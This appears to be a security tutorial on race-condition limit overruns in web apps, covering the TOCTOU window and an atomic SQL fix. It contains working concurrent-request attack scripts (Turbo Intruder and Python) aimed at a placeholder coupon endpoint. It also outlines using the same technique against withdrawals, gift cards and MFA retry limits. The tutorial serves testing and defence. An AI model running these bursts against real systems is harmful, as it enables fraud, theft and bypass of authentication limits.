Race Conditions: The Limit-Overrun in Web Apps

Concurrent requests in a narrow time window can redeem a coupon twice or overdraw a balance. We cover the TOCTOU window and how to enforce atomicity.

Race conditions exploit the gap between checking a condition and acting on it — the time-of-check to time-of-use (TOCTOU) window. Interleave two requests inside that gap and an app that assumes operations happen one at a time will do something twice that should happen once: redeem a single-use coupon five times, overdraw a balance, claim a username twice. This is how to find and prove the limit overrun.

Finding it

The vulnerable shape reads a value, decides on it, then writes — with no atomicity binding the steps. Each individual request is perfectly valid in isolation; only the overlap is malicious, which is why reading the handler top-to-bottom looks correct and why these bugs survive review.
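
The shape is easy to reproduce locally. The sketch below is a hypothetical in-memory model, not code from any real application: `CouponStore`, `redeem_racy`, and `run_burst` are names invented for illustration, and the `threading.Barrier` stands in for the race window by holding every thread between the check and the write. That forces the interleaving an attacker tries to induce over the network.

```python
import threading
from concurrent.futures import ThreadPoolExecutor


class CouponStore:
    """Hypothetical in-memory stand-in for a coupons table."""

    def __init__(self, uses_remaining):
        self.uses_remaining = uses_remaining


def redeem_racy(store, window):
    remaining = store.uses_remaining      # 1. read (time of check)
    if remaining <= 0:                    # 2. decide
        return False
    window.wait()                         # simulated gap: every thread has passed the check
    store.uses_remaining = remaining - 1  # 3. write (time of use), based on a stale read
    return True


def run_burst(n=5):
    """Race n redemptions against a single-use coupon."""
    store = CouponStore(uses_remaining=1)
    window = threading.Barrier(n)
    with ThreadPoolExecutor(max_workers=n) as pool:
        results = list(pool.map(lambda _: redeem_racy(store, window), range(n)))
    return results.count(True), store.uses_remaining


applied, remaining = run_burst()
print(applied, "redemptions of a single-use coupon; counter now reads", remaining)
```

Every thread reads `uses_remaining == 1` before any of them writes, so all of them succeed, and the stored counter ends at 0 rather than going negative. The counter alone would not reveal the overrun.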

Where to hunt:

  • Discount codes, gift cards, referral/signup bonuses (redeem beyond the limit).
  • Balance withdrawals and inventory checks (over-withdraw, oversell).
  • "First one wins" claims — usernames, seats, handles.
  • Multi-step approvals where a state check and the transition are separate.

The detection question for any limited action is: "what if I send this N times simultaneously instead of once?" If the limit is enforced in two non-atomic steps, the answer is an overrun.

Proof of concept

The reliable modern technique is the single-packet attack. Over HTTP/2, the client withholds the final frame of each request and then completes all of them in a single TCP packet, so they reach the server together regardless of network jitter, which is what used to make these races flaky. Turbo Intruder (Burp) implements it directly:

# Turbo Intruder: fire 30 identical coupon redemptions in one TCP packet
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)
    for i in range(30):
        engine.queue(target.req, gate='race1')   # hold all requests...
    engine.openGate('race1')                      # ...then release together

def handleResponse(req, interesting):
    table.add(req)

The request being raced is an ordinary redemption:

POST /api/cart/apply-coupon HTTP/1.1
Host: shop.example.com
Authorization: Bearer eyJ...
Content-Type: application/json

{"code": "SAVE50", "cart_id": "abc123"}

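Confirm success by the resulting state, not by status codes alone: if SAVE50 is single-use but the cart shows the discount applied more than once, the check-then-decrement raced. A count such as 12 of 30 requests returning 200 "applied" is a strong hint, but the cart or ledger is the proof. A quick scripted version without Burp (coarser than the single-packet attack, since each thread opens its own connection):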

import concurrent.futures
import threading
import requests

URL = "https://shop.example.com/api/cart/apply-coupon"
H = {"Authorization": "Bearer eyJ...", "Content-Type": "application/json"}
body = {"code": "SAVE50", "cart_id": "abc123"}
N = 30
start = threading.Barrier(N)  # hold every worker until all N are ready

def fire(_):
    start.wait()  # release all requests together instead of as threads spin up
    return requests.post(URL, json=body, headers=H, timeout=10).status_code

with concurrent.futures.ThreadPoolExecutor(max_workers=N) as ex:
    print(list(ex.map(fire, range(N))).count(200), "of", N, "applied")

Going further

The same primitive proves higher-value overruns:

  • Balance/withdrawal: race a withdrawal of your full balance N times; multiple successes mean you pulled more money than you had.
  • Gift card / wallet top-up: redeem one code into several accounts simultaneously.
  • Multi-step state: race a "submit for approval" against an "edit" so the object transitions while still mutable.
  • MFA / OTP windows: race the verification check so several guesses land before the attempt counter increments, sidestepping a "5 tries" limit.

A practical tell during recon is any endpoint whose success depends on a counter, a balance, or a uniqueness constraint that the code reads, branches on, and writes back in separate statements — that read-decide-write shape is the whole vulnerability.
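
Closing the window means collapsing read, decide, and write into one atomic operation. A minimal sketch, assuming a SQL-backed coupon table: the table layout and the `make_db` and `redeem_atomic` helpers are hypothetical, and SQLite is used only because it ships with Python. The conditional `UPDATE` performs the check and the decrement in a single statement, and the affected-row count reports whether this request won.

```python
import sqlite3


def make_db():
    """Create a throwaway in-memory table holding one single-use coupon."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE coupons (code TEXT PRIMARY KEY, uses_remaining INTEGER NOT NULL)"
    )
    db.execute("INSERT INTO coupons VALUES ('SAVE50', 1)")
    db.commit()
    return db


def redeem_atomic(db, code):
    # Check and decrement happen in one statement, so there is no gap to race.
    cur = db.execute(
        "UPDATE coupons SET uses_remaining = uses_remaining - 1 "
        "WHERE code = ? AND uses_remaining > 0",
        (code,),
    )
    db.commit()
    return cur.rowcount == 1  # 0 rows updated means the limit was already reached


db = make_db()
results = [redeem_atomic(db, "SAVE50") for _ in range(5)]
print(results.count(True), "of 5 applied")
```

The calls here run sequentially, so this shows the statement shape rather than a concurrency test. The point is that the limit lives in the `WHERE` clause, and the database, not application code, decides which request decrements the counter.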

Several factors widen the window and make exploitation reliable: horizontal scaling (requests hit different processes that do not share in-memory state), HTTP/2 multiplexing (many requests over one connection), and eventual-consistency stores that lag. Endpoints that were "theoretically racy but practically safe" are increasingly exploitable as a result.

Because the attack is pure timing, it leaves normal-looking requests in the logs — the proof is the state, so capture the before/after: the limit (uses_remaining = 1), the burst of simultaneous requests, and the violated invariant afterward (discount applied 12 times, balance negative). Test only on authorized targets with accounts you control.
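
One way to keep that evidence tidy is a small record of the three parts. This is only a sketch: the `RaceEvidence` class and its field names are hypothetical, the 409 status for losing requests is an assumption, and the numbers reuse the 12-of-30 example from above.

```python
from dataclasses import dataclass


@dataclass
class RaceEvidence:
    limit_before: int    # e.g. uses_remaining read before the burst
    status_codes: list   # one status code per raced request
    applied_after: int   # times the action took effect, read from state afterward

    def overrun(self):
        """How many times the action succeeded beyond the limit."""
        return max(0, self.applied_after - self.limit_before)

    def summary(self):
        return (
            f"limit={self.limit_before} sent={len(self.status_codes)} "
            f"http_200={self.status_codes.count(200)} "
            f"applied={self.applied_after} overrun={self.overrun()}"
        )


# Assumed outcome: 12 requests returned 200, the other 18 were rejected with 409.
evidence = RaceEvidence(
    limit_before=1,
    status_codes=[200] * 12 + [409] * 18,
    applied_after=12,
)
print(evidence.summary())
```

Keeping `applied_after` separate from the status codes reflects the point above: the violated invariant is read from application state, and the response tally only supports it.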